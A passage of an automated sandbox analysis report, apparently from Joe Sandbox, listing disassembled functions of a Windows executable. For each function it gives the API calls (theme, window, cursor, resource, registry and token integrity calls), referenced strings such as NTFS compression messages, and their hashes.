                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AF2B
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AF3D
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF4F
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF61
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF73
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF85
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF97
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AFA9
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AFBB
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AFCD
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AFDF
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFF1
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B003
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B015
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B027
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B039
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B04B
                                                                          • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,0049298F), ref: 00460B03
                                                                          • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00460B09
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$LibraryLoad
                                                                          • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                          • API String ID: 2238633743-2683653824
                                                                          • Opcode ID: d51c42bd4142a1419cebe145bcc4e62e91902ea29c04febc714d013a4538a5c6
                                                                          • Instruction ID: 1dc59214256150821f64c4a5b3e010dcdd688bc926fb1e8d07287d1f160dc46b
                                                                          • Opcode Fuzzy Hash: d51c42bd4142a1419cebe145bcc4e62e91902ea29c04febc714d013a4538a5c6
                                                                          • Instruction Fuzzy Hash: EFB09290B80700A19E00B7F25883D2B140C8580F1D720847B7010791DBEA7C500099AE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00413C68 Relevance: 6.1, APIs: 4, Instructions: 107COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDesktopWindow.USER32 ref: 00413CB6
                                                                          • GetDesktopWindow.USER32 ref: 00413D6E
                                                                            • Part of subcall function 00418E30: 6F5BC6F0.COMCTL32(?,00000000,00413F33,00000000,00414043,?,?,00494628), ref: 00418E4C
                                                                            • Part of subcall function 00418E30: ShowCursor.USER32(00000001,?,00000000,00413F33,00000000,00414043,?,?,00494628), ref: 00418E69
                                                                          • SetCursor.USER32(00000000,?,?,?,?,00413A63,00000000,00413A76), ref: 00413DAC
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CursorDesktopWindow$Show
                                                                          • String ID:
                                                                          • API String ID: 2074268717-0
                                                                          • Opcode ID: 45eab49b9f5213df2d83ef42053e3571740e663cae2ab16979cfe5a355df0160
                                                                          • Instruction ID: f419cdb22dffc734eda11f614feaf6954746e02452764f6a113fc2dd2abbdfc2
                                                                          • Opcode Fuzzy Hash: 45eab49b9f5213df2d83ef42053e3571740e663cae2ab16979cfe5a355df0160
                                                                          • Instruction Fuzzy Hash: C7419275600110AFC700EFB9E984F4677E0AB95315B1684BBE104CB365DA38ED82CF69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004089BC Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 004089DD
                                                                          • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408A4C
                                                                          • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408AE7
                                                                          • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408B26
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: LoadString$FileMessageModuleName
                                                                          • String ID:
                                                                          • API String ID: 704749118-0
                                                                          • Opcode ID: 9475b91f6b12abc75ac03e97528c4589aec67ab33c443f8169a5e3803f66a059
                                                                          • Instruction ID: 14e0b5c6cd5b97c86ff82054d5328c9cf2b7980ad66a2a36783bbd85928cae88
                                                                          • Opcode Fuzzy Hash: 9475b91f6b12abc75ac03e97528c4589aec67ab33c443f8169a5e3803f66a059
                                                                          • Instruction Fuzzy Hash: 6E3143706083809FD330EB65C945B9B77E89B8A304F40483FB6C8E72D1DB7999058767
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0044E158 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E1A1
                                                                            • Part of subcall function 0044C7E4: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044C816
                                                                          • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E225
                                                                            • Part of subcall function 0042BB24: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BB38
                                                                          • IsRectEmpty.USER32(?), ref: 0044E1E7
                                                                          • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E20A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                          • String ID:
                                                                          • API String ID: 855768636-0
                                                                          • Opcode ID: 2f4f09d471764e0b40a61100a36ec5f960fc55f7f790cb04e4501a849a6d4287
                                                                          • Instruction ID: 5406ccee5fb56c270110fdf5510288933eb71161ddc8a876bede12871bf79798
                                                                          • Opcode Fuzzy Hash: 2f4f09d471764e0b40a61100a36ec5f960fc55f7f790cb04e4501a849a6d4287
                                                                          • Instruction Fuzzy Hash: 6E114D71B4031027E210BA7E9C86B5B66CDAB88749F04493FB605EB383DEB9DC058299
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0048F85C Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • OffsetRect.USER32(?,?,00000000), ref: 0048F8C0
                                                                          • OffsetRect.USER32(?,00000000,?), ref: 0048F8DB
                                                                          • OffsetRect.USER32(?,?,00000000), ref: 0048F8F5
                                                                          • OffsetRect.USER32(?,00000000,?), ref: 0048F910
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: OffsetRect
                                                                          • String ID:
                                                                          • API String ID: 177026234-0
                                                                          • Opcode ID: b92cc9e0c51abad00843a30158c78bfcdf3235bd319301de45a4e2a650a825ad
                                                                          • Instruction ID: ce36c56c1c582fdda7e72a0fface693b427ee6f0177311c7c28b849f91f6b588
                                                                          • Opcode Fuzzy Hash: b92cc9e0c51abad00843a30158c78bfcdf3235bd319301de45a4e2a650a825ad
                                                                          • Instruction Fuzzy Hash: 0F217CB6700201ABD300EE69CC85E5BB7DEEBD4344F14CA3AF954C7249D738E94887A6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00417188 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCursorPos.USER32 ref: 004171D0
                                                                          • SetCursor.USER32(00000000), ref: 00417213
                                                                          • GetLastActivePopup.USER32(?), ref: 0041723D
                                                                          • GetForegroundWindow.USER32(?), ref: 00417244
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                          • String ID:
                                                                          • API String ID: 1959210111-0
                                                                          • Opcode ID: c1cfbe4ca0de68e17c4a100ee12b51fff2b36c6f0ea2abcdeec6e8c4ace2589f
                                                                          • Instruction ID: 088d0700f5649383027441de99f76d51f9d962fb002c63a2b2ca12876e25bed5
                                                                          • Opcode Fuzzy Hash: c1cfbe4ca0de68e17c4a100ee12b51fff2b36c6f0ea2abcdeec6e8c4ace2589f
                                                                          • Instruction Fuzzy Hash: 192183713086018ACB20ABA9D889AD733F1AF85714F0545ABF8589B792D73DDC82CB59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0048F514 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MulDiv.KERNEL32(8B500000,00000008,?), ref: 0048F529
                                                                          • MulDiv.KERNEL32(50142444,00000008,?), ref: 0048F53D
                                                                          • MulDiv.KERNEL32(F76037E8,00000008,?), ref: 0048F551
                                                                          • MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 0048F56F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6335ae3c13ddf35d91c6dca3ece5bfa36ba83b479f3d3f49975b0228b2d303f4
                                                                          • Instruction ID: 6f2f5d3731a38f560a61ba406435f1238513cd740096e42b36e3bab7bd81765c
                                                                          • Opcode Fuzzy Hash: 6335ae3c13ddf35d91c6dca3ece5bfa36ba83b479f3d3f49975b0228b2d303f4
                                                                          • Instruction Fuzzy Hash: AA112172604204BBCB40EEADC8C4D9B77ECEF4D360B24416AF918DB246D634ED408BA8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0041F3F0 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetClassInfoA.USER32(00400000,0041F3E0,?), ref: 0041F411
                                                                          • UnregisterClassA.USER32(0041F3E0,00400000), ref: 0041F43A
                                                                          • RegisterClassA.USER32(00493598), ref: 0041F444
                                                                          • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F47F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                          • String ID:
                                                                          • API String ID: 4025006896-0
                                                                          • Opcode ID: 369b4581b8718a6b7f5c456dac74c697fddaa2f7eb52355fd25e4240f497afd1
                                                                          • Instruction ID: ba8a097de1154e85499311c45b2324022c4db67c4a949dbf0f11183773784737
                                                                          • Opcode Fuzzy Hash: 369b4581b8718a6b7f5c456dac74c697fddaa2f7eb52355fd25e4240f497afd1
                                                                          • Instruction Fuzzy Hash: 720152712401047BCB20EF68ED81E9B37ACA76D314B11413BBA05E72E1D635DD165BAD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040D170 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D187
                                                                          • LoadResource.KERNEL32(00400000,72756F73,0040A928,00400000,00000001,00000000,?,0040D0E4,00000000,?,00000000,?,?,0047764C,0000000A,REGDLL_EXE), ref: 0040D1A1
                                                                          • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A928,00400000,00000001,00000000,?,0040D0E4,00000000,?,00000000,?,?,0047764C), ref: 0040D1BB
                                                                          • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A928,00400000,00000001,00000000,?,0040D0E4,00000000,?,00000000,?), ref: 0040D1C5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                          • String ID:
                                                                          • API String ID: 3473537107-0
                                                                          • Opcode ID: b3c15c4636e7b2139434bed422b55b0694fd43cf85b07dfc26612a38abd02691
                                                                          • Instruction ID: a2e4909c1946fcd89949086e6ecb513f2c22862e5b7fa6f76d970aa484769738
                                                                          • Opcode Fuzzy Hash: b3c15c4636e7b2139434bed422b55b0694fd43cf85b07dfc26612a38abd02691
                                                                          • Instruction Fuzzy Hash: BEF0FF726056046F9754EE9DA881D5B76ECDE48264320416AF908EB246DE38DD118B78
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00454504 Relevance: 6.0, APIs: 4, Instructions: 41registrywindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                          • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,00459AD2,?,?,?,?,?,00000000,00459AF9), ref: 00454540
                                                                          • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,00459AD2,?,?,?,?,?,00000000), ref: 00454549
                                                                          • RemoveFontResourceA.GDI32(00000000), ref: 00454556
                                                                          • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0045456A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                          • String ID:
                                                                          • API String ID: 4283692357-0
                                                                          • Opcode ID: 96fa512f3f662ed87c37535a3766b553a9c327ccaabb4965c9ab73448b41aaf6
                                                                          • Instruction ID: 1eb0840f44da6d39683793e989569f75594476954d085f3704b84519527e0fd3
                                                                          • Opcode Fuzzy Hash: 96fa512f3f662ed87c37535a3766b553a9c327ccaabb4965c9ab73448b41aaf6
                                                                          • Instruction Fuzzy Hash: B9F054B574535037EA10B6B69C47F1B228C8F94749F10483BB600EF2C3D97CD904962D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0046B6D8 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,00000000), ref: 0046B729
                                                                          Strings
                                                                          • Failed to set NTFS compression state (%d)., xrefs: 0046B73A
                                                                          • Unsetting NTFS compression on directory: %s, xrefs: 0046B70F
                                                                          • Setting NTFS compression on directory: %s, xrefs: 0046B6F7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                          • API String ID: 1452528299-1392080489
                                                                          • Opcode ID: d53215409e502109a5a1d7da470d817492eeecdd52408c6bdcbefe281b75e759
                                                                          • Instruction ID: 8a2dc4ed195109a8471c1236a5c58557194bf09444f2f11eb0036fe1721b7234
                                                                          • Opcode Fuzzy Hash: d53215409e502109a5a1d7da470d817492eeecdd52408c6bdcbefe281b75e759
                                                                          • Instruction Fuzzy Hash: 6E014431D0824866CF04D7ED90512EDBBF4DF49305F54C5AFA454DB242EBB9094987DB
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0046BFC8 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,00000000), ref: 0046C019
                                                                          Strings
                                                                          • Failed to set NTFS compression state (%d)., xrefs: 0046C02A
                                                                          • Unsetting NTFS compression on file: %s, xrefs: 0046BFFF
                                                                          • Setting NTFS compression on file: %s, xrefs: 0046BFE7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                          • API String ID: 1452528299-3038984924
                                                                          • Opcode ID: 64252f671433613891e1a7440361f40b2ffce42b5703e84520e84a0d5a72c339
                                                                          • Instruction ID: f21eca6685929eef9c1991e0f0882ebce6d76680defdff1bfc8b5815b9b403a8
                                                                          • Opcode Fuzzy Hash: 64252f671433613891e1a7440361f40b2ffce42b5703e84520e84a0d5a72c339
                                                                          • Instruction Fuzzy Hash: FD014430E08248AACB14D7ED90912BDBBF49F09304F54C1AFA494DB242EAB905088B9B
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00477888 Relevance: 6.0, APIs: 4, Instructions: 35sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CountSleepTick
                                                                          • String ID:
                                                                          • API String ID: 2227064392-0
                                                                          • Opcode ID: 7f9be6c62347cb85835d29a1a4366730904a4622375b7e81926710e7e3913ef5
                                                                          • Instruction ID: 600cfe0a74c4f2c1bd3ebedcfd2d7a6b72f2f4999c435aba37b1015e9725878a
                                                                          • Opcode Fuzzy Hash: 7f9be6c62347cb85835d29a1a4366730904a4622375b7e81926710e7e3913ef5
                                                                          • Instruction Fuzzy Hash: B5E0E53170D501498A2031AE988A6AB4689CA89324B1985FFF48CE6242C4184C05C76F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00473420 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000008,?,0047B069,?,?,00000001,00000000,00000002,00000000,0047B8F6,?,?,?,?,?,00492A60), ref: 00473429
                                                                          • OpenProcessToken.ADVAPI32(00000000,00000008,?,0047B069,?,?,00000001,00000000,00000002,00000000,0047B8F6), ref: 0047342F
                                                                          • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,0047B069,?,?,00000001,00000000,00000002,00000000,0047B8F6), ref: 00473451
                                                                          • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,0047B069,?,?,00000001,00000000,00000002,00000000), ref: 00473462
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                          • String ID:
                                                                          • API String ID: 215268677-0
                                                                          • Opcode ID: 5e6959b0aa08eab338446373c25635829722180206a086ec912edd4ecd6bffc1
                                                                          • Instruction ID: b2e67a826371a673a356ac5d6eaa9b5bb997f149e1c9fc538a60d49279a5b6ce
                                                                          • Opcode Fuzzy Hash: 5e6959b0aa08eab338446373c25635829722180206a086ec912edd4ecd6bffc1
                                                                          • Instruction Fuzzy Hash: 99F03061644301ABD600EAB5CC82E9B77DCEB44754F04883A7E98D72C1D679DD08AB66
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004241B0 Relevance: 6.0, APIs: 4, Instructions: 26windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastActivePopup.USER32(?), ref: 004241BC
                                                                          • IsWindowVisible.USER32(?), ref: 004241CD
                                                                          • IsWindowEnabled.USER32(?), ref: 004241D7
                                                                          • SetForegroundWindow.USER32(?), ref: 004241E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                          • String ID:
                                                                          • API String ID: 2280970139-0
                                                                          • Opcode ID: 45cc8346385df99cd35dc406275c17b3484034b80334a27cef1f15798a1a4062
                                                                          • Instruction ID: 7a261241521d5f36110480f60a41559dbc21bd8b6604a945fb8666e4bf107b55
                                                                          • Opcode Fuzzy Hash: 45cc8346385df99cd35dc406275c17b3484034b80334a27cef1f15798a1a4062
                                                                          • Instruction Fuzzy Hash: 0DE08699B06531139E31FA251885ABB25ACCD54B883C60127BC04F7243DF1CCFA0C1AC
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00466BEC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 247windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSystemMenu.USER32(00000000,00000000,0000F060,00000001), ref: 00466DD9
                                                                          • EnableMenuItem.USER32(00000000,00000000,00000000), ref: 00466DDF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
